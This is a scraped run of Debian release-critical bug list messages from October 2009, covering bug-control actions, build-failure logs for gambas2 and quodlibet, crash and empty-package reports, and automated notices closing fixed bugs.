Processing commands for cont...@bugs.debian.org: tags 552094 = Bug #552094 [kde-style-skulpture] [qt4-designer] Crash on Marble plugins loading Removed tag(s) unreproducible and moreinfo. reassign 552094 kde-style-skulpture Bug #552094 [kde-style-skulpture] [qt4-designer] Crash on Marble plugins loading Ignoring request to reassign bug #552094 to the same package thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#544474: Update in stable
* Dominic Hargreaves: Are there any plans to update openjdk in stable with these changes, or should I look into backporting? Wrong bug number? I don't see how this bug requires a fix for stable. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552094: [qt4-designer] Crash on Marble plugins loading
tags 552094 = reassign 552094 kde-style-skulpture thanks Hello, On penktadienis 23 Spalis 2009 17:05:43 Kbyte wrote: The marble plugin is installed by libmarble-dev. Could you please remove this package and try to start qt designer again? Please look this backstrace: [snip] If you switch the qt style to Oxygen, the designer will start. Please reassign the bug to kde-style-skulpture. Sure. -- Modestas Vainius modes...@vainius.eu signature.asc Description: This is a digitally signed message part.
Bug#543021: Fix commited to SVN
Hi, Sorry for the wait. I commited the fix to the Debian Qt/KDE Maintainers' KDE-extra's SVN repository (svn.debian.org/svn/pkg-kde/kde-extras/knmap/trunk), revision number 16168 ... I'm waiting for someone to sponsor it. Cheers, Ryan -- |_)|_/ Ryan Kavanagh | GnuPG key | \| \ http://blog.ryanak.ca/| 4A11C97A (Transitioning from E95EDDC9) () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments signature.asc Description: Digital signature
Bug#544474: Update in stable
On Sun, Oct 25, 2009 at 04:33:14PM +0100, Florian Weimer wrote: * Dominic Hargreaves: Are there any plans to update openjdk in stable with these changes, or should I look into backporting? Wrong bug number? I don't see how this bug requires a fix for stable. Apologies, you're correct; my message should have been sent to #542210; please ignore. Dominic. -- Dominic Hargreaves | http://www.larted.org.uk/~dom/ PGP key 5178E2A5 from the.earth.li (keyserver,web,email) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552332: sugar-calculate-activity: empty package (except for /usr/share/doc)
Package: sugar-calculate-activity Version: 30-2 Severity: grave Justification: renders package unusable sugar-calculate-activity doesn't contain anything except documentation: sascha.si...@emac:~$ dpkg -L sugar-calculate-activity /. /usr /usr/share /usr/share/doc /usr/share/doc/sugar-calculate-activity /usr/share/doc/sugar-calculate-activity/buildinfo.gz /usr/share/doc/sugar-calculate-activity/changelog.Debian.gz /usr/share/doc/sugar-calculate-activity/NEWS.gz /usr/share/doc/sugar-calculate-activity/AUTHORS /usr/share/doc/sugar-calculate-activity/copyright sascha.si...@emac:~$ -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash CU Sascha -- http://sascha.silbe.org/ http://www.infra-silbe.de/ signature.asc Description: Digital signature
Bug#542210: Update in stable
Hi, Are there any plans to update openjdk in stable with these changes, or should I look into backporting? Thanks, Dominic. -- Dominic Hargreaves | http://www.larted.org.uk/~dom/ PGP key 5178E2A5 from the.earth.li (keyserver,web,email) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Processed (with 1 errors): Re: Bug#552069: crashes of iceweasel when accessing the bookmarks
Processing commands for cont...@bugs.debian.org: unmerge 546599 Bug#546599: iceweasel: sqlite3 crash when editing bookmarks Bug#552069: crashes of iceweasel when accessing the bookmarks Disconnected #546599 from all other report(s). merge 546599 552069 Bug#546599: iceweasel: sqlite3 crash when editing bookmarks Bug#552069: crashes of iceweasel when accessing the bookmarks Merged 546599 552069. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#552291: CVE-2009-3626: DoS in Unicode processing
Processing commands for cont...@bugs.debian.org: package perl perl-base Limiting to bugs with field 'package' containing at least one of 'perl', 'perl-base' Limit currently set to 'package':'perl', 'perl-base' reassign 552291 perl-base Bug #552291 [perl] CVE-2009-3626: DoS in Unicode processing Bug reassigned from package 'perl' to 'perl-base'. Bug No longer marked as found in versions perl/5.10.1-5. found 552291 perl-base/5.10.1-5 Bug #552291 [perl-base] CVE-2009-3626: DoS in Unicode processing The source perl-base and version 5.10.1-5 do not appear to match any binary packages Bug Marked as found in versions perl-base/5.10.1-5. tags 552291 + confirmed upstream Bug #552291 [perl-base] CVE-2009-3626: DoS in Unicode processing Added tag(s) upstream and confirmed. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#544019: marked as done (build of gambas2_2.15.2-1 on sparc (dist=unstable) failed)
Your message dated Sun, 25 Oct 2009 16:04:08 + with message-id e1n25zg-0007hp...@ries.debian.org and subject line Bug#544019: fixed in gambas2 2.17.0-1 has caused the Debian Bug report #544019, regarding build of gambas2_2.15.2-1 on sparc (dist=unstable) failed to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 544019: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=544019 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: gambas2 Version: 2.15.2-1 Severity: serious gb.db.firebird Installing the components... Compiling gb.settings... /bin/bash: line 1: 14843 Bus error /build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr/bin/gbc2 -ag -r /build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr Installing gb.settings... /usr/bin/install: cannot stat `.info': No such file or directory chmod: cannot access `/build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr/share/gambas2/info/gb.settings.info': No such file or directory /usr/bin/install: cannot stat `.list': No such file or directory chmod: cannot access `/build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr/share/gambas2/info/gb.settings.list': No such file or directory Compiling gb.info... /bin/bash: line 1: 14853 Bus error /build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr/bin/gbc2 -ag -r /build/buildd-gambas2_2.15.2-1-sparc-l197oM/gambas2-2.15.2/debian/tmp/usr dh_installchangelogs -pgambas2 ChangeLog dh_install --sourcedir=debian/tmp -a dh_install: gambas2-gb-xml-rpc missing files (usr/share/gambas2/info/gb.xml.rpc.*), aborting make: *** [binary-arch] Error 1 dpkg-buildpackage: error: /usr/bin/fakeroot debian/rules binary-arch gave error exit status 2 ---End Message--- ---BeginMessage--- Source: gambas2 Source-Version: 2.17.0-1 We believe that the bug you reported is fixed in the latest version of gambas2, which is due to be installed in the Debian FTP archive: gambas2-dev_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-dev_2.17.0-1_i386.deb gambas2-doc_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-doc_2.17.0-1_all.deb gambas2-gb-chart_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-chart_2.17.0-1_all.deb gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb gambas2-gb-compress-zlib_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-zlib_2.17.0-1_i386.deb gambas2-gb-compress_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress_2.17.0-1_i386.deb gambas2-gb-crypt_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-crypt_2.17.0-1_i386.deb gambas2-gb-db-firebird_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-firebird_2.17.0-1_i386.deb gambas2-gb-db-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-db-form_2.17.0-1_all.deb gambas2-gb-db-mysql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-mysql_2.17.0-1_i386.deb gambas2-gb-db-odbc_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-odbc_2.17.0-1_i386.deb gambas2-gb-db-postgresql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-postgresql_2.17.0-1_i386.deb gambas2-gb-db-sqlite2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite2_2.17.0-1_i386.deb gambas2-gb-db-sqlite_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite_2.17.0-1_i386.deb gambas2-gb-db_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db_2.17.0-1_i386.deb gambas2-gb-desktop_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-desktop_2.17.0-1_i386.deb gambas2-gb-form-dialog_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-dialog_2.17.0-1_all.deb gambas2-gb-form-mdi_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-mdi_2.17.0-1_all.deb gambas2-gb-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form_2.17.0-1_all.deb gambas2-gb-gtk-ext_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-ext_2.17.0-1_i386.deb gambas2-gb-gtk-svg_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-svg_2.17.0-1_i386.deb gambas2-gb-gtk_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk_2.17.0-1_i386.deb gambas2-gb-gui_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gui_2.17.0-1_i386.deb gambas2-gb-image_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-image_2.17.0-1_i386.deb gambas2-gb-info_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-info_2.17.0-1_all.deb gambas2-gb-net-curl_2.17.0-1_i386.deb to
Bug#547635: marked as done (gambas2 FTBFS on on armel (dist=unstable))
Your message dated Sun, 25 Oct 2009 16:04:08 + with message-id e1n25zg-0007hr...@ries.debian.org and subject line Bug#547635: fixed in gambas2 2.17.0-1 has caused the Debian Bug report #547635, regarding gambas2 FTBFS on on armel (dist=unstable) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 547635: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=547635 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: gambas2 Version: 2.16.0-1 Severity: serious User: debian-...@lists.debian.org Usertag: eabi building your package failed on buildd's: dh_installdocs -s dh_installchangelogs -pgambas2 ChangeLog dh_install --sourcedir=debian/tmp -s dh_install: gambas2-gb-xml-rpc missing files (usr/share/gambas2/info/gb.xml.rpc.*), aborting make: *** [binary-arch] Error 1 full build log aT: https://buildd.debian.org/fetch.cgi?pkg=gambas2arch=armelver=2.16.0-1stamp=1253486519file=logas=raw ---End Message--- ---BeginMessage--- Source: gambas2 Source-Version: 2.17.0-1 We believe that the bug you reported is fixed in the latest version of gambas2, which is due to be installed in the Debian FTP archive: gambas2-dev_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-dev_2.17.0-1_i386.deb gambas2-doc_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-doc_2.17.0-1_all.deb gambas2-gb-chart_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-chart_2.17.0-1_all.deb gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb gambas2-gb-compress-zlib_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-zlib_2.17.0-1_i386.deb gambas2-gb-compress_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress_2.17.0-1_i386.deb gambas2-gb-crypt_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-crypt_2.17.0-1_i386.deb gambas2-gb-db-firebird_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-firebird_2.17.0-1_i386.deb gambas2-gb-db-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-db-form_2.17.0-1_all.deb gambas2-gb-db-mysql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-mysql_2.17.0-1_i386.deb gambas2-gb-db-odbc_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-odbc_2.17.0-1_i386.deb gambas2-gb-db-postgresql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-postgresql_2.17.0-1_i386.deb gambas2-gb-db-sqlite2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite2_2.17.0-1_i386.deb gambas2-gb-db-sqlite_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite_2.17.0-1_i386.deb gambas2-gb-db_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db_2.17.0-1_i386.deb gambas2-gb-desktop_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-desktop_2.17.0-1_i386.deb gambas2-gb-form-dialog_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-dialog_2.17.0-1_all.deb gambas2-gb-form-mdi_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-mdi_2.17.0-1_all.deb gambas2-gb-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form_2.17.0-1_all.deb gambas2-gb-gtk-ext_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-ext_2.17.0-1_i386.deb gambas2-gb-gtk-svg_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-svg_2.17.0-1_i386.deb gambas2-gb-gtk_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk_2.17.0-1_i386.deb gambas2-gb-gui_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gui_2.17.0-1_i386.deb gambas2-gb-image_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-image_2.17.0-1_i386.deb gambas2-gb-info_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-info_2.17.0-1_all.deb gambas2-gb-net-curl_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net-curl_2.17.0-1_i386.deb gambas2-gb-net-smtp_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net-smtp_2.17.0-1_i386.deb gambas2-gb-net_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net_2.17.0-1_i386.deb gambas2-gb-opengl_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-opengl_2.17.0-1_i386.deb gambas2-gb-pcre_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-pcre_2.17.0-1_i386.deb gambas2-gb-pdf_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-pdf_2.17.0-1_i386.deb gambas2-gb-qt-ext_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-qt-ext_2.17.0-1_i386.deb gambas2-gb-qt-kde-html_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-qt-kde-html_2.17.0-1_i386.deb gambas2-gb-qt-kde_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-qt-kde_2.17.0-1_i386.deb gambas2-gb-qt-opengl_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-qt-opengl_2.17.0-1_i386.deb
Bug#534161: marked as done ([random crashes] streamtuner: Fatal IO error 11 (Resource temporarily unavailable) on X server :0.0.)
Your message dated Sun, 25 Oct 2009 16:33:23 + with message-id e1n261z-0002a7...@ries.debian.org and subject line Bug#534161: fixed in libcanberra 0.22-1 has caused the Debian Bug report #534161, regarding [random crashes] streamtuner: Fatal IO error 11 (Resource temporarily unavailable) on X server :0.0. to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 534161: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534161 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: streamtuner Version: 0.99.99-15 Severity: grave Justification: renders package unusable streamtuner randomly crashes with the following message displayed on the console streamtuner: Fatal IO error 11 (Resource temporarily unavailable) on X server :0.0. it does not seem related to any particular action With kind regards, Wouter Koolen-Wijkstra -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (990, 'testing'), (500, 'unstable'), (101, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30.1 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=en_US.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages streamtuner depends on: ii libc6 2.9-12 GNU C Library: Shared libraries ii libcurl37.18.2-8.1 Multi-protocol file transfer libra ii libglib2.0-02.20.1-2 The GLib library of C routines ii libgtk2.0-0 2.16.1-2 The GTK+ graphical user interface ii libtagc01.5-6TagLib Audio Meta-Data Library (C ii libxml2 2.7.3.dfsg-1 GNOME XML library ii python 2.5.4-2 An interactive high-level object-o ii python-gtk2 2.14.1-3 Python bindings for the GTK+ widge ii python-support 1.0.3automated rebuilding support for P ii python2.5 2.5.4-1 An interactive high-level object-o streamtuner recommends no packages. Versions of packages streamtuner suggests: pn streamripper none (no description available) ii yelp 2.26.0-1 Help browser for GNOME -- no debconf information ---End Message--- ---BeginMessage--- Source: libcanberra Source-Version: 0.22-1 We believe that the bug you reported is fixed in the latest version of libcanberra, which is due to be installed in the Debian FTP archive: gnome-session-canberra_0.22-1_all.deb to pool/main/libc/libcanberra/gnome-session-canberra_0.22-1_all.deb libcanberra-dev_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-dev_0.22-1_amd64.deb libcanberra-doc_0.22-1_all.deb to pool/main/libc/libcanberra/libcanberra-doc_0.22-1_all.deb libcanberra-gstreamer-dbg_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gstreamer-dbg_0.22-1_amd64.deb libcanberra-gstreamer_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gstreamer_0.22-1_amd64.deb libcanberra-gtk-dev_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gtk-dev_0.22-1_amd64.deb libcanberra-gtk-module-dbg_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gtk-module-dbg_0.22-1_amd64.deb libcanberra-gtk-module_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gtk-module_0.22-1_amd64.deb libcanberra-gtk0-dbg_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gtk0-dbg_0.22-1_amd64.deb libcanberra-gtk0_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-gtk0_0.22-1_amd64.deb libcanberra-pulse-dbg_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-pulse-dbg_0.22-1_amd64.deb libcanberra-pulse_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra-pulse_0.22-1_amd64.deb libcanberra0-dbg_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra0-dbg_0.22-1_amd64.deb libcanberra0_0.22-1_amd64.deb to pool/main/libc/libcanberra/libcanberra0_0.22-1_amd64.deb libcanberra_0.22-1.diff.gz to pool/main/libc/libcanberra/libcanberra_0.22-1.diff.gz libcanberra_0.22-1.dsc to pool/main/libc/libcanberra/libcanberra_0.22-1.dsc libcanberra_0.22.orig.tar.gz to pool/main/libc/libcanberra/libcanberra_0.22.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 534...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Sjoerd Simons sjo...@debian.org (supplier of updated
Bug#549419: marked as done (gambas2 2.16.0-1 FTBFS on sparc)
Your message dated Sun, 25 Oct 2009 16:04:08 + with message-id e1n25zg-0007ht...@ries.debian.org and subject line Bug#549419: fixed in gambas2 2.17.0-1 has caused the Debian Bug report #549419, regarding gambas2 2.16.0-1 FTBFS on sparc to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 549419: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=549419 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: gambas2 Version: 2.16.0-1 Severity: serious Hi, this package FTBFS on sparc now: gb.desktop /bin/bash: line 10: 25430 Bus error /build/buildd-gambas2_2.16.0-1-sparc-LIogZG/gambas2-2.16.0/debian/tmp/usr/bin/gbc2 -ag -r /build/buildd-gambas2_2.16.0-1-sparc-LIogZG/gambas2-2.16.0/debian/tmp/usr Creating the information files for gb.desktop component... gb.desktop [...] dh_installchangelogs -pgambas2 ChangeLog dh_install --sourcedir=debian/tmp -s dh_install: gambas2-gb-xml-rpc missing files (usr/share/gambas2/info/gb.xml.rpc.*), aborting make: *** [binary-arch] Error 1 dpkg-buildpackage: error: /usr/bin/fakeroot debian/rules binary-arch gave error exit status 2 Two issues: 1. The build needs to abort on the first error; 2. It should work. Please see https://buildd.debian.org/fetch.cgi?pkg=gambas2ver=2.16.0-1arch=sparcstamp=1254556556file=log for the full build log. Cheers, Andi ---End Message--- ---BeginMessage--- Source: gambas2 Source-Version: 2.17.0-1 We believe that the bug you reported is fixed in the latest version of gambas2, which is due to be installed in the Debian FTP archive: gambas2-dev_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-dev_2.17.0-1_i386.deb gambas2-doc_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-doc_2.17.0-1_all.deb gambas2-gb-chart_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-chart_2.17.0-1_all.deb gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-bzlib2_2.17.0-1_i386.deb gambas2-gb-compress-zlib_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress-zlib_2.17.0-1_i386.deb gambas2-gb-compress_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-compress_2.17.0-1_i386.deb gambas2-gb-crypt_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-crypt_2.17.0-1_i386.deb gambas2-gb-db-firebird_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-firebird_2.17.0-1_i386.deb gambas2-gb-db-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-db-form_2.17.0-1_all.deb gambas2-gb-db-mysql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-mysql_2.17.0-1_i386.deb gambas2-gb-db-odbc_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-odbc_2.17.0-1_i386.deb gambas2-gb-db-postgresql_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-postgresql_2.17.0-1_i386.deb gambas2-gb-db-sqlite2_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite2_2.17.0-1_i386.deb gambas2-gb-db-sqlite_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db-sqlite_2.17.0-1_i386.deb gambas2-gb-db_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-db_2.17.0-1_i386.deb gambas2-gb-desktop_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-desktop_2.17.0-1_i386.deb gambas2-gb-form-dialog_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-dialog_2.17.0-1_all.deb gambas2-gb-form-mdi_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form-mdi_2.17.0-1_all.deb gambas2-gb-form_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-form_2.17.0-1_all.deb gambas2-gb-gtk-ext_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-ext_2.17.0-1_i386.deb gambas2-gb-gtk-svg_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk-svg_2.17.0-1_i386.deb gambas2-gb-gtk_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gtk_2.17.0-1_i386.deb gambas2-gb-gui_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-gui_2.17.0-1_i386.deb gambas2-gb-image_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-image_2.17.0-1_i386.deb gambas2-gb-info_2.17.0-1_all.deb to pool/main/g/gambas2/gambas2-gb-info_2.17.0-1_all.deb gambas2-gb-net-curl_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net-curl_2.17.0-1_i386.deb gambas2-gb-net-smtp_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net-smtp_2.17.0-1_i386.deb gambas2-gb-net_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-net_2.17.0-1_i386.deb gambas2-gb-opengl_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-opengl_2.17.0-1_i386.deb gambas2-gb-pcre_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-pcre_2.17.0-1_i386.deb gambas2-gb-pdf_2.17.0-1_i386.deb to pool/main/g/gambas2/gambas2-gb-pdf_2.17.0-1_i386.deb
Bug#552288: marked as done (FTBFS: `debian/exfalso/usr/share/pixmaps': No such file or directory)
Your message dated Sun, 25 Oct 2009 16:33:56 + with message-id e1n262w-0002gm...@ries.debian.org and subject line Bug#552288: fixed in quodlibet 2.1-4 has caused the Debian Bug report #552288, regarding FTBFS: `debian/exfalso/usr/share/pixmaps': No such file or directory to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552288: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552288 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: quodlibet Version: 2.1-3 Severity: serious Justification: FTBFS Hi, quodlibet FTBFS on some architecture. https://buildd.debian.org/fetch.cgi?pkg=quodlibet;ver=2.1-3;arch=amd64;stamp=1256443935 - # install icon files cp debian/tmp$(_py_=`pyversions -d`; python${_py_#python*} -c 'from distutils import sysconfig; print(sysconfig.get_python_lib())')/quodlibet/images/exfalso.png debian/exfalso/usr/share/pixmaps cp: cannot create regular file `debian/exfalso/usr/share/pixmaps': No such file or directory make[1]: *** [override_dh_install] Error 1 make[1]: Leaving directory `/build/buildd/quodlibet-2.1' - Please check and fix this problem. Best regards, Nobuhiro -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686-bigmem (SMP w/2 CPU cores) Locale: LANG=ja_JP.UTF-8, LC_CTYPE=ja_JP.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash ---End Message--- ---BeginMessage--- Source: quodlibet Source-Version: 2.1-4 We believe that the bug you reported is fixed in the latest version of quodlibet, which is due to be installed in the Debian FTP archive: exfalso_2.1-4_all.deb to pool/main/q/quodlibet/exfalso_2.1-4_all.deb quodlibet-ext_2.1-4_i386.deb to pool/main/q/quodlibet/quodlibet-ext_2.1-4_i386.deb quodlibet_2.1-4.diff.gz to pool/main/q/quodlibet/quodlibet_2.1-4.diff.gz quodlibet_2.1-4.dsc to pool/main/q/quodlibet/quodlibet_2.1-4.dsc quodlibet_2.1-4_all.deb to pool/main/q/quodlibet/quodlibet_2.1-4_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 552...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Christine Spang christ...@debian.org (supplier of updated quodlibet package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 11:20:02 -0400 Source: quodlibet Binary: exfalso 